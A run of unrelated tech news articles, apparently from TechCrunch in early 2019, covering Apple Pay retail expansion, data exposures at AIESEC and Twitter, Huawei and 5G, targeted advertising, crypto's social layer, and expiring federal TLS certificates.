A little more retail momentum for Apple Pay: Apple has announced another clutch of U.S. retailers will soon support its eponymous mobile payment tech — most notably discount retailer Target.
Apple Pay is rolling out to Target stores now, according to Apple, which says it will be available in all 1,850 of its U.S. retail locations “in the coming weeks”.
Also signing up to Apple Pay are fast food chains Taco Bell and Jack in the Box; Speedway convenience stores; and Hy-Vee supermarkets in the midwest.
“With the addition of these national retailers, 74 of the top 100 merchants in the US and 65 per cent of all retail locations across the country will support Apple Pay,” notes Apple in a press release.
Speedway customers can use Apple Pay at all of its approximately 3,000 locations across the Midwest, East Coast and Southeast from today, according to Apple; and also at Hy-Vee stores’ more than 245 outlets in the Midwest.
It says the payment tech is also rolling out to more than 7,000 Taco Bell and 2,200 Jack in the Box locations “in the next few months”.
Back in the summer Apple announced it had signed up long time hold out CVS, with the pharmacy introducing Apple Pay across its ~8,400 stand-alone location last year.
Also signing up then: 7-Eleven, which Apple says now launched support for Apple Pay in 95 per cent of its U.S. convenience stores in 2018.
Last year retail giant Costco also completed the rollout of Apple Pay to its more than 500 U.S. warehouses.
In December, Apple Pay also finally launched in Germany — where Apple slated it would be accepted at a range of “supermarkets, boutiques, restaurants and hotels and many other places” at launch, albeit ‘cash only’ remains a common demand from the country’s small businesses.
AIESEC, a non-profit that bills itself as the “world’s largest youth-run organization,” exposed more than four million intern applications with personal and sensitive information on a server without a password.
Bob Diachenko, an independent security researcher, found an unprotected Elasticsearch database containing the applications on January 11, a little under a month after the database was first exposed.
The database contained “opportunity applications” contained the applicant’s name, gender, date of birth, and the reasons why the person was applying for the internship, according to Diachenko’s blog post on SecurityDiscovery, shared exclusively with TechCrunch. The database also contains the date and time when an application was rejected.
AIESEC, which has more than 100,000 members in 126 countries, said the database was inadvertently exposed 20 days prior to Diachenko’s notification — just before Christmas — as part of an “infrastructure improvement project.”
The database was secured the same day of Diachenko’s private disclosure.
Laurin Stahl, AEISEC’s global vice president of platforms, confirmed the exposure to TechCrunch but claimed that no more than 40 users were affected.
Stahl said that the agency had “informed the users who would most likely be on the top of frequent search results” in the database — some 40 individuals, he said — after the agency found no large requests of data from unfamiliar IP addresses.
“Given the fact that the security researcher found the cluster, we informed the users who would most likely be on the top of frequent search results on all indices of the cluster,” said Stahl. “The investigation we did over the weekend showed that no more than 50 data records affecting 40 users were available in these results.”
Stahl said that the agency informed Dutch data protection authorities of the exposure three days after the exposure.
“Our platform and entire infrastructure is still hosted in the EU,” he said, despite its recently relocation to headquarters in Canadia.
Like companies and organizations, non-profits are not exempt from European rules where EU citizens’ data is collected, and can face a fine of up to €20 million or four percent — whichever is higher — of their global annual revenue for serious GDPR violations.
It’s the latest instance of an Elasticsearch instance going unprotected.
A massive database leaking millions of real-time SMS text message data was found and secured last year, a popular massage service, and phone contact lists on five million users from an exposed emoji app.
If you leave something on the internet long enough, someone will hack it.
The reality is that many device manufacturers make it far too easy by using default passwords that are widely documented, allowing anyone to log in as “admin” and snoop around. Often, there’s no password at all.
Enter “Shodan Safari,” a popular part-game, part-expression of catharsis, where hackers tweet and share their worst finds on Shodan, a search engine for exposed devices and databases popular with security researchers. Almost anything that connects to the internet gets scraped and tagged in Shodan’s vast search engine — including what the device does and internet ports are open, which helps Shodan understand what the device is. If a particular port is open, it could be a webcam. If certain header comes back, it’s backend might be viewable in the browser.
Think of Shodan Safari as internet dumpster diving.
From cameras to routers, hospital CT scanners to airport explosive detector units, you’d be amazed — and depressed — at what you can find exposed on the open internet.
— Morbid Angel
Biometric payment card startup Zwipe has swiped $14M to add to an earlier Series B round as it continues to work towards commercializing technology that embeds a fingerprint reader in payment plastic for an added layer of security.
“We are not commercially rolled out yet, we expect that to happen in the second half of this year, starting first in Europe and potentially in the Middle East,” a spokesman told us, saying the financing will be used to scale up the company to prepare for a commercial rollout of a biometric payment card solution in the second half of 2019.
He said it’s also eyeing additional form factors such as wearables down the line, penciling in 2020 for expanding into other devices and verticals.
Although it has yet to push its tech past the pilot stage with payment cards.
“Our technology is currently deployed in pilot programs in Italy, with Intesa Sanpaolo Bank and with 10 different banks across the Middle East,” the spokesman told us. “We have active partnerships globally. In APAC, specifically China and the Philippines, we expect to launch further trials in the near term. In Europe we have piloted with the Bank of Cyprus and expect to launch several more trials in Europe in the first half of 2019.”
The new funding was raised via an offering of 6M new shares, from around 2,300 investors, ahead of a planned listing of the company on Merkur Market, Oslo Børs. Zwipe says the share offer was substantially over-subscribed, and it expects trading to commence on or around January 28. The pre-money valuation of the company is stated as NOK 189 million ($22M).
Commenting on the raise in a statement, CEO Andre Løvestam said: “Zwipe is at the forefront of a global shift towards more secure and convenient contactless payments and the market is primed for growth. We are confident that our industry leading technology and partnerships will secure a strong market position both in the short and long-term. Thanks to the new funding received, we can intensify our efforts to support our customers and partners in ‘making convenience secure’.”
The US-China tension over Huawei is leaving telecommunications companies around the world at a crossroad, but one spoke out last week. Telus, one of Canada’s largest phone companies showed support for its Chinese partner despite a global backlash against Huawei over cybersecurity threats.
“Clearly, Huawei remains a viable and reliable participant in the Canadian telecommunications space, bolstered by globally leading innovation, comprehensive security measures, and new software upgrades,” said an internal memo signed by a Telus executive that The Globe and Mail obtained.
The Vancouver-based firm is among a handful of Canadian companies that could potentially leverage the Shenzhen-based company to build out 5G systems, the technology that speeds up not just mobile connection but more crucially powers emerging fields like low-latency autonomous driving and 8K video streaming. TechCrunch has contacted Telus for comments and will update the article when more information becomes available.
The United States has long worried that China’s telecom equipment makers could be beholden to Beijing and thus pose espionage risks. As fears heighten, President Donald Trump is reportedly mulling a boycott of Huawei and ZTE this year, according to Reuters. The Wall Street Journal reported last week that US federal prosecutors may bring criminal charges against Huawei for stealing trade secrets.
Australia and New Zealand have both blocked local providers from using Huawei components. The United Kingdom has not officially banned Huawei but its authorities have come under pressure to take sides soon.
Canada, which is part of the Five Eyes intelligence-sharing network alongside Australia, New Zealand, the UK and the US, is still conducting a security review ahead of its 5G rollout but has been urged by neighboring US to steer clear of Huawei in building the next-gen tech.
China has hit back at spy claims against its tech crown jewel over the past months. Last week, its ambassador to Canada Lu Shaye warned that blocking the world’s largest telecom equipment maker may yield repercussions.
“I always have concerns that Canada may make the same decision as the US, Australia and New Zealand did. And I believe such decisions are not fair because their accusations are groundless,” Lu said at a press conference. “As for the consequences of banning Huawei from 5G network, I am not sure yet what kind of consequences will be, but I surely believe there will be consequences.”
Last week also saw Huawei chief executive officer Ren Zhengfei appear in a rare interview with international media. At the roundtable, he denied security charges against the firm he founded in 1987 and cautioned the exclusion of Chinese firms may delay plans in the US to deliver ultra-high-speed networks to rural populations — including to the rich.
“If Huawei is not involved in this, these districts may have to pay very high prices in order to enjoy that level of experience,” argued Ren. “Those countries may voluntarily approach Huawei and ask Huawei to sell them 5G products rather than banning Huawei from selling 5G systems.”
The Huawei controversy comes as the US and China are locked in a trade war that’s sending reverberations across countries that rely on the US for security protection and China for investment and increasingly skilled — not just cheap — labor.
Canada got caught between the feuding giants after it arrested Huawei’s chief financial officer Meng Wanzhou, who’s also Ren’s daughter, at the request of US authorities. The White House is now facing a deadline at the end of January to extradite Meng. Meanwhile, Canadian Prime Minister Justin Trudeau and Trump are urging Beijing to release two Canadian citizens who Beijing detained following Meng’s arrest.
No one likes being stalked around the Internet by adverts. It’s the uneasy joke you can’t enjoy laughing at. Yet vast people-profiling ad businesses have made pots of money off of an unregulated Internet by putting surveillance at their core.
But what if creepy ads don’t work as claimed? What if all the filthy lucre that’s currently being sunk into the coffers of ad tech giants — and far less visible but no less privacy-trampling data brokers — is literally being sunk, and could both be more honestly and far better spent?
Case in point: This week Digiday reported that the New York Times managed to grow its ad revenue after it cut off ad exchanges in Europe. The newspaper did this in order to comply with the region’s updated privacy framework, GDPR, which includes a regime of supersized maximum fines.
The newspaper business decided it simply didn’t want to take the risk, so first blocked all open-exchange ad buying on its European pages and then nixed behavioral targeting. The result? A significant uptick in ad revenue, according to Digiday’s report.
“NYT International focused on contextual and geographical targeting for programmatic guaranteed and private marketplace deals and has not seen ad revenues drop as a result, according to Jean-Christophe Demarta, SVP for global advertising at New York Times International,” it writes.
“Currently, all the ads running on European pages are direct-sold. Although the publisher doesn’t break out exact revenues for Europe, Demarta said that digital advertising revenue has increased significantly since last May and that has continued into early 2019.”
It also quotes Demarta summing up the learnings: “The desirability of a brand may be stronger than the targeting capabilities. We have not been impacted from a revenue standpoint, and, on the contrary, our digital advertising business continues to grow nicely.”
So while (of course) not every publisher is the NYT, publishers that have or can build brand cachet, and pull in a community of engaged readers, must and should pause for thought — and ask who is the real winner from the notion that digitally served ads must creep on consumers to work?
The NYT’s experience puts fresh taint on long-running efforts by tech giants like Facebook to press publishers to give up more control and ownership of their audiences by serving and even producing content directly for the third party platforms. (Pivot to video anyone?)
Such efforts benefit platforms because they get to make media businesses dance to their tune. But the self-serving nature of pulling publishers away from their own distribution channels (and content convictions) looks to have an even more bass string to its bow — as a cynical means of weakening the link between publishers and their audiences, thereby risking making them falsely reliant on adtech intermediaries squatting in the middle of the value chain.
There are other signs behavioural advertising might be a gigantically self-serving con too.
Look at non-tracking search engine DuckDuckGo, for instance, which has been making a profit by serving keyword-based ads and not profiling users since 2014, all the while continuing to grow usage — and doing so in a market that’s dominated by search giant Google.
DDG recently took in $10M in VC funding from a pension fund that believes there’s an inflection point in the online privacy story. These investors are also displaying strong conviction in the soundness of the underlying (non-creepy) ad business, again despite the overbearing presence of Google.
Meanwhile, Internet users continue to express widespread fear and loathing of the ad tech industry’s bandwidth- and data-sucking practices by running into the arms of ad blockers. Figures for usage of ad blocking tools step up each year, with between a quarter and a third of U.S. connected device users’ estimated to be blocking ads as of 2018 (rates are higher among younger users).
Ad blocking firm Eyeo, maker of the popular AdBlock Plus product, has achieved such a position of leverage that it gets Google et al to pay it to have their ads whitelisted by default — under its self-styled ‘acceptable ads’ program. (Though no one will say how much they’re paying to circumvent default ad blocks.)
So the creepy ad tech industry is not above paying other third parties for continued — and, at this point, doubly grubby (given the ad blocking context) — access to eyeballs. Does that sound even slightly like a functional market?
In recent years expressions of disgust and displeasure have also been coming from the ad spending side too — triggered by brand-denting scandals attached to the hateful stuff algorithms have been serving shiny marketing messages alongside. You don’t even have to be worried about what this stuff might be doing to democracy to be a concerned advertiser.
Fast moving consumer goods giants Unilever and Procter & Gamble are two big spenders which have expressed concerns. The former threatened to pull ad spend if social network giants didn’t clean up their act and prevent their platforms algorithmically accelerating hateful and divisive content.
While the latter has been actively reevaluating its marketing spending — taking a closer look at what digital actually does for it. And last March Adweek reported it had slashed $200M from its digital ad budget yet had seen a boost in its reach of 10 per cent, reinvesting the money into areas with “‘media reach’ including television, audio and ecommerce”.
The company’s CMO, Marc Pritchard, declined to name which companies it had pulled ads from but in a speech at an industry conference he said it had reduced spending “with several big players” by 20 per cent to 50 per cent, and still its ad business grew.
So chalk up another tale of reduced reliance on targeted ads yielding unexpected business uplift.
At the same time, academics are digging into the opaquely shrouded question of who really benefits from behavioral advertising. And perhaps getting closer to an answer.
Last fall, at an FTC hearing on the economics of big data and personal information, Carnegie Mellon University professor of IT and public policy, Alessandro Acquisti, teased a piece of yet to be published research — working with a large U.S. publisher that provided the researchers with millions of transactions to study.
Acquisti said the research showed that behaviourally targeted advertising had increased the publisher’s revenue but only marginally. At the same time they found that marketers were having to pay orders of magnitude more to buy these targeted ads, despite the minuscule additional revenue they generated for the publisher.
“What we found was that, yes, advertising with cookies — so targeted advertising — did increase revenues — but by a tiny amount. Four per cent. In absolute terms the increase in revenues was $0.000008 per advertisment,” Acquisti told the hearing. “Simultaneously we were running a study, as merchants, buying ads with a different degree of targeting. And we found that for the merchants sometimes buying targeted ads over untargeted ads can be 500% times as expensive.”
“How is it possible that for merchants the cost of targeting ads is so much higher whereas for publishers the return on increased revenues for targeted ads is just 4%,” he wondered, posing a question that publishers should really be asking themselves — given, in this example, they’re the ones doing the dirty work of snooping on (and selling out) their readers.
Acquisti also made the point that a lack of data protection creates economic winners and losers, arguing this is unavoidable — and thus qualifying the oft-parroted tech industry lobby line that privacy regulation is a bad idea because it would benefit an already dominant group of players. The rebuttal is that a lack of privacy rules also does that. And that’s exactly where we are now.
“There is a sort of magical thinking happening when it comes to targeted advertising [that claims] everyone benefits from this,” Acquisti continued. “Now at first glance this seems plausible. The problem is that upon further inspection you find there is very little empirical validation of these claims… What I’m saying is that we actually don’t know very well to which these claims are true and false. And this is a pretty big problem because so many of these claims are accepted uncritically.”
There’s clearly far more research that needs to be done to robustly interrogate the effectiveness of targeted ads against platform claims and vs more vanilla types of advertising (i.e. which don’t demand reams of personal data to function). But the fact that robust research hasn’t been done is itself interesting.
Acquisti noted the difficulty of researching “opaque blackbox” ad exchanges that aren’t at all incentivized to be transparent about what’s going on. Also pointing out that Facebook has sometimes admitted to having made mistakes that significantly inflated its ad engagement metrics.
His wider point is that much current research into the effectiveness of digital ads is problematically narrow and so is exactly missing a broader picture of how consumers might engage with alternative types of less privacy-hostile marketing.
In a nutshell, then, the problem is the lack of transparency from ad platforms; and that lack serving the self same opaque giants.
But there’s more. Critics of the current system point out it relies on mass scale exploitation of personal data to function, and many believe this simply won’t fly under Europe’s tough new GDPR framework.
They are applying legal pressure via a set of GDPR complaints, filed last fall, that challenge the legality of a fundamental piece of the (current) adtech industry’s architecture: Real-time bidding (RTB); arguing the system is fundamentally incompatible with Europe’s privacy rules.
We covered these complaints last November but the basic argument is that bid requests essentially constitute systematic data breaches because personal data is broadcast widely to solicit potential ad buys and thereby poses an unacceptable security risk — rather than, as GDPR demands, people’s data being handled in a way that “ensures appropriate security”.
To spell it out, the contention is the entire behavioral advertising business is illegal because it’s leaking personal data at such vast and systematic scale it cannot possibly comply with EU data protection law.
Regulators are considering the argument, and courts may follow. But it’s clear adtech systems that have operated in opaque darkness for years, without no worry of major compliance fines, no longer have the luxury of being able to take their architecture as a given.
Greater legal risk might be catalyst enough to encourage a market shift towards less intrusive targeting; ads that aren’t targeted based on profiles of people synthesized from heaps of personal data but, much like DuckDuckGo’s contextual ads, are only linked to a real-time interest and a generic location. No creepy personal dossiers necessary.
If Acquisti’s research is to be believed — and here’s the kicker for Facebook et al — there’s little reason to think such ads would be substantially less effective than the vampiric microtargeted variant that Facebook founder Mark Zuckerberg likes to describe as “relevant”.
The ‘relevant ads’ badge is of course a self-serving concept which Facebook uses to justify creeping on users while also pushing the notion that its people-tracking business inherently generates major extra value for advertisers. But does it really do that? Or are advertisers buying into another puffed up fake?
Facebook isn’t providing access to internal data that could be used to quantify whether its targeted ads are really worth all the extra conjoined cost and risk. While the company’s habit of buying masses of additional data on users, via brokers and other third party sources, makes for a rather strange qualification. Suggesting things aren’t quite what you might imagine behind Zuckerberg’s drawn curtain.
Behavioral ad giants are facing growing legal risk on another front. The adtech market has long been referred to as a duopoly, on account of the proportion of digital ad spending that gets sucked up by just two people-profiling giants: Google and Facebook (the pair accounted for 58% of the market in 2018, according to eMarketer data) — and in Europe a number of competition regulators have been probing the duopoly.
Earlier this month the German Federal Cartel Office was reported to be on the brink of partially banning Facebook from harvesting personal data from third party providers (including but not limited to some other social services it owns). Though an official decision has yet to be handed down.
While, in March 2018, the French Competition Authority published a meaty opinion raising multiple concerns about the online advertising sector — and calling for an overhaul and a rebalancing of transparency obligations to address publisher concerns that dominant platforms aren’t providing access to data about their own content.
The EC’s competition commissioner, Margrethe Vestager, is also taking a closer look at whether data hoarding constitutes a monopoly. And has expressed a view that, rather than breaking companies up in order to control platform monopolies, the better way to go about it in the modern ICT era might be by limiting access to data — suggesting another potentially looming legal headwind for personal data-sucking platforms.
At the same time, the political risks of social surveillance architectures have become all too clear.
Whether microtargeted political propaganda works as intended or not is still a question mark. But few would support letting attempts to fiddle elections just go ahead and happen anyway.
Yet Facebook has rushed to normalize what are abnormally hostile uses of its tools; aka the weaponizing of disinformation to further divisive political ends — presenting ‘election security’ as just another day-to-day cost of being in the people farming business. When the ‘cost’ for democracies and societies is anything but normal.
Whether or not voters can be manipulated en masse via the medium of targeted ads, the act of targeting itself certainly has an impact — by fragmenting the shared public sphere which civilized societies rely on to drive consensus and compromise. Ergo, unregulated social media is inevitably an agent of antisocial change.
The solution to technology threatening democracy is far more transparency; so regulating platforms to understand how, why and where data is flowing, and thus get a proper handle on impacts in order to shape desired outcomes.
Greater transparency also offers a route to begin to address commercial concerns about how the modern adtech market functions.
And if and when ad giants are forced to come clean — about how they profile people; where data and value flows; and what their ads actually deliver — you have to wonder what if anything will be left unblemished.
People who know they’re being watched alter their behavior. Similarly, platforms may find behavioral change enforced upon them, from above and below, when it becomes impossible for everyone else to ignore what they’re doing.
A funny thing happened in the second half of 2018. At some moment, all the people active in crypto looked around and realized there weren’t very many of us. The friends we’d convinced during the last holiday season were no longer speaking to us. They had stopped checking their Coinbase accounts. The tide had gone out from the beach. Tokens and blockchains were supposed to change the world; how come nobody was using them?
In most cases, still, nobody is using them. In this respect, many crypto projects have succeeded admirably. Cryptocurrency’s appeal is understood by many as freedom from human fallibility. There is no central banker, playing politics with the money supply. There is no lawyer, overseeing the contract. Sometimes it feels like crypto developers adopted the defense mechanism of the skunk. It’s working: they are succeeding at keeping people away.
Some now acknowledge the need for human users, the so-called “social layer,” of Bitcoin and other crypto networks. That human component is still regarded as its weakest link. I’m writing to propose that crypto’s human component is its strongest link. For the builders of crypto networks, how to attract the right users is a question that should come before how to defend against attackers (aka, the wrong users). Contrary to what you might hear on Twitter, when evaluating a crypto network, the demographics and ideologies of its users do matter. They are the ultimate line of defense, and the ultimate decision-maker on direction and narrative.What Ethereum got right
Since the collapse of The DAO, no one in crypto should be allowed to say “code is law” with a straight face. The DAO was a decentralized venture fund that boldly claimed pure governance through code, then imploded when someone found a loophole. Ethereum, a crypto protocol on which The DAO was built, erased this fiasco with a hard fork, walking back the ledger of transactions to the moment before disaster struck. Dissenters from this social-layer intervention kept going on Ethereum’s original, unforked protocol, calling it Ethereum Classic. To so-called “Bitcoin maximalists,” the DAO fork is emblematic of Ethereum’s trust-dependency, and therefore its weakness.
There’s irony, then, in maximalists’ current enthusiasm for narratives describing Bitcoin’s social-layer resiliency. The story goes: in the event of a security failure, Bitcoin’s community of developers, investors, miners and users are an ultimate layer of defense. We, Bitcoin’s community, have the option to fork the protocol—to port our investment of time, capital and computing power onto a new version of Bitcoin. It’s our collective commitment to a trust-minimized monetary system that makes Bitcoin strong. (Disclosure: I hold bitcoin and ether.)
Even this narrative implies trust—in the people who make up that crowd. Historically, Bitcoin Core developers, who maintain the Bitcoin network’s dominant client software, have also exerted influence, shaping Bitcoin’s road map and the story of its use cases. Ethereum’s flavor of minimal trust is different, having a public-facing leadership group whose word is widely imbibed. In either model, the social layer abides. When they forked away The DAO, Ethereum’s leaders had to convince a community to come along.
You can’t believe in the wisdom of the crowd and discount its ability to see through an illegitimate power grab, orchestrated from the outside. When people criticize Ethereum or Bitcoin, they are really criticizing this crowd, accusing it of a propensity to fall for false narratives.How do you protect Bitcoin’s codebase?
In September, Bitcoin Core developers patched and disclosed a vulnerability that would have enabled an attacker to crash the Bitcoin network. That vulnerability originated in March, 2017, with Bitcoin Core 0.14. It sat there for 18 months until it was discovered.
There’s no doubt Bitcoin Core attracts some of the best and brightest developers in the world, but they are fallible and, importantly, some of them are pseudonymous. Could a state actor, working pseudonymously, produce code good enough to be accepted into Bitcoin’s protocol? Could he or she slip in another vulnerability, undetected, for later exploitation? The answer is undoubtedly yes, it is possible, and it would be naïve to believe otherwise. (I doubt Bitcoin Core developers themselves are so naïve.)
Why is it that no government has yet attempted to take down Bitcoin by exploiting such a weakness? Could it be that governments and other powerful potential attackers are, if not friendly, at least tolerant towards Bitcoin’s continued growth? There’s a strong narrative in Bitcoin culture of crypto persisting against hostility. Is that narrative even real?The social layer is key to crypto success
Some argue that sexism and racism don’t matter to Bitcoin. They do. Bitcoin’s hodlers should think carefully about the books we recommend and the words we write and speak. If your social layer is full of assholes, your network is vulnerable. Not all hacks are technical. Societies can be hacked, too, with bad or unsecure ideas. (There are more and more numerous examples of this, outside of crypto.)
Not all white papers are as elegant as Satoshi Nakamoto’s Bitcoin white paper. Many run over 50 pages, dedicating lengthy sections to imagining various potential attacks and how the network’s internal “crypto-economic” system of incentives and penalties would render them bootless. They remind me of the vast digital fortresses my eight-year-old son constructs in Minecraft, bristling with trap doors and turrets.
I love my son (and his Minecraft creations), but the question both he and crypto developers may be forgetting to ask is, why would anyone want to enter this forbidding fortress—let alone attack it? Who will enter, bearing talents, ETH or gold? Focusing on the user isn’t yak shaving, when the user is the ultimate security defense. I’m not suggesting security should be an afterthought, but perhaps a network should be built to bring people in, rather than shut them out.
The author thanks Tadge Dryja and Emin Gün Sirer, who provided feedback that helped hone some of the ideas in this article.
Google is removing apps from Google Play that request permission to access call logs and SMS text message data but haven’t been manually vetted by Google staff.
The search and mobile giant said it is part of a move to cut down on apps that have access to sensitive calling and texting data.
Google said in October that Android apps will no longer be allowed to use the legacy permissions as part of a wider push for developers to use newer, more secure and privacy minded APIs. Many apps request access to call logs and texting data to verify two-factor authentication codes, for social sharing, or to replace the phone dialer. But Google acknowledged that this level of access can and has been abused by developers who misuse the permissions to gather sensitive data — or mishandle it altogether.
“Our new policy is designed to ensure that apps asking for these permissions need full and ongoing access to the sensitive data in order to accomplish the app’s primary use case, and that users will understand why this data would be required for the app to function,” wrote Paul Bankhead, Google’s director of product management for Google Play.
Any developer wanting to retain the ability to ask a user’s permission for calling and texting data has to fill out a permissions declaration.
Google will review the app and why it needs to retain access, and will weigh in several considerations, including why the developer is requesting access, the user benefit of the feature that’s requesting access, and the risks associated with having access to call and texting data.
Bankhead conceded that under the new policy, some use cases will “no longer be allowed,” rendering some apps obsolete.
So far, tens of thousands of developers have already submitted new versions of their apps either removing the need to access call and texting permissions, Google said, or have submitted a permissions declaration.
Developers with a submitted declaration have until March 9 to receive approval or remove the permissions. In the meantime, Google has a full list of permitted use cases for the call log and text message permissions, as well as alternatives.
The last two years alone has seen several high profile cases of Android apps or other services leaking or exposing call and text data. In late 2017, popular Android keyboard ai.type exposed a massive database of 31 million users, including 374 million phone numbers.
2018 wasn’t all bad. It turned out to be a record year for venture capital firms investing in cybersecurity companies.
According to new data out by Strategic Cyber Ventures, a cybersecurity-focused investment firm with a portfolio of four cybersecurity companies, more than $5.3 billion was funneled into companies focused on protecting networks, systems and data across the world, despite fewer deals done during the year.
That’s up from 20 percent — $4.4 billion — from 2017, and up from close to double on 2016.
Part of the reason was several “mega” funding rounds, according to the company. Last year saw some of the big eight companies getting bigger, amassing a total of $1.3 billion in funding last year. That includes Tanium’s combined $375 million investment, Anchorfree’s $295 million and Crowdstrike’s $200 million.
According to the report, North America leads the rest of the world with $4 billion in VC funding, with Europe around neck-and-neck at $550 million each but growing year-over-year.
In fact, according to the data, California — where many of the big companies have their headquarters — accounts for nearly half of all VC funding in cybersecurity in 2018.By comparison, only about $300 million went to the “government” region — including Maryland, Virginia, and Washington DC, where many government-backed or focused companies are located.
“As DC residents, we have to think there is more the city could do to entice cybersecurity companies to establish their headquarters in the city,” the firm said. Virtru, an email encryption and data privacy firm, drove the only funding of cybersecurity investment in Washington DC last year, they added.
“We’ve seen this trend in the broader tech ecosystem as well, with many, large international funds and investment outside of the U.S.,” the firm said. “Simply put, amazing and valuable technology companies are being created outside of the U.S.”
Looking ahead, Tanium and Crowdstrike are highly anticipated to IPO this year — so long as the markets hold stable.
“It’s still unclear what the public equity markets have in store in 2019,” the firm said. “A few weeks in and we’re already experiencing a government shutdown, trade wars with China, and expected slow down in global economic growth.”
“However, only time will tell what 2019 has in store,” the firm concluded.
Twitter accidentally revealed some users’ “protected” (aka, private) tweets, the company disclosed this afternoon. The “Protect your Tweets” setting typically allows people to use Twitter in a non-public fashion. These users get to approve who can follow them and who can view their content. For some Android users over a period of several years, that may not have been the case – their tweets were actually made public as a result of this bug.
The company says that the issue impacted Twitter for Android users who made certain account changes while the “Protect your Tweets” option was turned on.
For example, if the user had changed their account email address, the “Protect your Tweets” setting was disabled.
We’ve become aware of and fixed an issue where the “Protect your Tweets” setting was disabled on Twitter for Android. Those affected have been alerted and we’ve turned the setting back on for them. More here: https://t.co/0qM5B1S393
— Twitter Support (@TwitterSupport) January 17, 2019
Twitter tells TechCrunch that’s just one example of an account change that could have prompted the issue. We asked for other examples, but the company declined share any specifics.
What’s fairly shocking is how long this issue has been happening.
Twitter says that users may have been impacted by the problem if they made these accounts changes between November 3, 2014, and January 14, 2019 – the day the bug was fixed.
The company has now informed those who were affected by the issue, and has re-enabled the “Protect your Tweets” setting if it had been disabled on those accounts. But Twitter says it’s making a public announcement because it “can’t confirm every account that may have been impacted.” (!!!)
The company explains to us it was only able to notify those people where it was able to confirm the account was impacted, but says it doesn’t have a complete list of impacted accounts. For that reason, it’s unable to offer an estimate of how many Twitter for Android users were affected in total.
This is a sizable mistake on Twitter’s part, as it essentially made content that users had explicitly indicated they wanted private available to the public. It’s unclear at this time if the issue will result in a GDPR violation and fine, as a result.
The one bright spot is that some of the impacted users may have noticed their account had become public because they would have received alerts – like notifications that people were following them without their direct consent. That could have prompted the user to re-enable the “protect tweets” setting on their own. But they may have chalked up the issue to user error or a small glitch, not realizing it was a system-wide bug.
“We recognize and appreciate the trust you place in us, and are committed to earning that trust every day,” wrote Twitter in a statement. “We’re very sorry this happened and we’re conducting a full review to help prevent this from happening again.”
The company says it believes the issue is now fully resolved.
We like to think of ourselves as nerds here at TechCrunch, which is why we’re bring you this.
During the government shutdown, security experts noticed several federal websites were throwing back browser errors because the TLS certificate, which lights up your browser with “HTTPS” or flashes a padlock, on many domains had expired. And because so many federal workers have been sent home on unpaid leave — or worse, working without pay but trying to fill in for most of their furloughed department — expired certificates aren’t getting renewed.
Depending on the security level, most websites will kick back browser errors. Some won’t let you in at all until the expired certificate is renewed.
We got thinking: how many of the major departments and agencies are at risk? We looked at the list of government domains (not including subdomains) from 18F, the government’s digital services unit, which updated the list just before the shutdown. Then we filtered out all the state domains, leaving just the domains of all federal agencies and the executive branch. We put all of those domains through a Python script that pulls information from the TLS certificate of each domain and returns its expiry value. Running that for a few hours in a bash script, we returned with a few thousand results.
In other words, we poked every certificate to see if it had expired — and, if not, when it would stop working.
Why does it matter? Above all else, it’s an inconvenience. Depending on how long this shutdown lasts, it won’t take long before some of the big federal sites might start throwing errors and locking users out. That could also affect third-party sites and apps that rely on those federal sites for data, such as through a developer API.
Security, however, is less of a factor, despite claims to the contrary. Eric Mill, a security expert who recently left 18F, the government’s digital agency, said that fears over expired certificates have been overblown.
“The security risk to users is actually very low, since trusting a recently expired cert doesn’t in and of itself allow traffic to be intercepted,” he said in a recent tweet. Mill also noted that there’s little automation across the agencies, leading to certificates expiring and eventual downtime — especially when sites and departments are understaffed, especially given that each federal agency and department is responsible for their own website.
We’ve compiled the following list of domains that have and will expire during the period of the shutdown, from December 22 onwards — while removing dead links and defunct domains that no longer load. Some domains redirect to other domains that might have a certificate that expires next year, but the first domain will still fail on its expiry date.
Remember, if you see a domain that’s working past its expiry, check the certificate and it’s likely been renewed. If you see any errors, feel free to drop me an email.
In all, we’ve counted five expired federal domains already, 13 domains will expire by the end of the month, and another 58 domains that’ll expire by the end of February.Expired:
- disasterhousing.gov — December 28
- landimaging.gov — January 3
- earthsystemprediction.gov — January 11 — the National Earth System Prediction Capability
- manufacturing.gov — January 14 — a portal highlighting national manufacturing initiatives.
- nationalhousinglocator.gov — January 16
- scidac.gov — January 23
- ginniemae.gov — January 23
- reportband.gov — January 23
- mojavedata.gov — January 26
- congressionaldirectory.gov — January 30 — a redirect to the directory of Congress
- congressionalrecord.gov — January 30 — another redirect to the congressional record
- fdsys.gov — January 30
- housecalendar.gov — January 30 — a redirect pointing hosting the House calendar
- presidentialdocuments.gov — January 30 — Compilation of Presidential Documents
- senatecalendar.gov — January 30 — a redirect to the Senate calendar
- uscode.gov — January 30
- donaciondeorganos.gov — January 30
- www.fishwatch.gov — January 30
- ferc.gov — February 1 — Federal Energy Regulatory Commission
- askkaren.gov — February 1
- befoodsafe.gov — February 1 — a redirecting link to the Department of Agriculture
- foodsafetyjobs.gov — February 1
- isitdoneyet.gov — February 1
- pregunteleakaren.gov — February 1
- www.democraticleader.gov — February 2 — website of the House majority leader
- majorityleader.gov — February 2 — redirecting link to the House majority’s page
- www.democraticwhip.gov — February 2 — website of the Congressional Democratic whip
- majoritywhip.gov — February 2 — redirecting link to Democratic whip’s page
- llnl.gov — February 2 — Lawrence Livermore National Laboratory
- moneyfactory.gov — February 6
- federalregister.gov — February 7 — the Federal Register
- wlci.gov — February 7
- fedrooms.gov — February 10
- floodsmart.gov — February 10 — the National Flood Insurance Program
- www.casl.gov — February 11
- geoplatform.gov — February 12 — the U.S. Geospatial Platform
- fatherhood.gov — February 13
- eeoc.gov — February 13 — the Equal Employment Opportunity Commission
- www.faa.gov — February 13 — the Federal Aviation Administration
- grants.gov — February 15
- indianaffairs.gov — February 15 — Department of the Interior’s Indian Affairs bureau
- jusfc.gov — February 15
- citizenscience.gov — February 16
- bia.gov — February 18 — another think to Indian Affairs
- presidentialinnovationfellows.gov — February 18
- usich.gov — February 18
- cdfifund.gov — February 18
- home.treasury.gov — February 18 — the end domain to the U.S. Treasury homepage
- financialstability.gov — February 18
- fsoc.gov — February 18
- irsauctions.gov — February 18
- irssales.gov — February 18
- makinghomeaffordable.gov — February 18
- mha.gov — February 18
- sigtarp.gov — February 18
- treas.gov — February 18
- ustreas.gov — February 18 — a redirect to the U.S. Treasury
- capnhq.gov — February 19 — another redirect link to the U.S. Treasury
- fdicseguro.gov — February 19
- sftool.gov — February 21
- nlm.gov — February 21 — the National Library of Medicine
- bea.gov — February 22
- opioids.gov — February 22 — the White House’s page on the opioids epidemic
- jamesmadison.gov — February 24
- usitc.gov — February 24 — the U.S. International Trade Commission
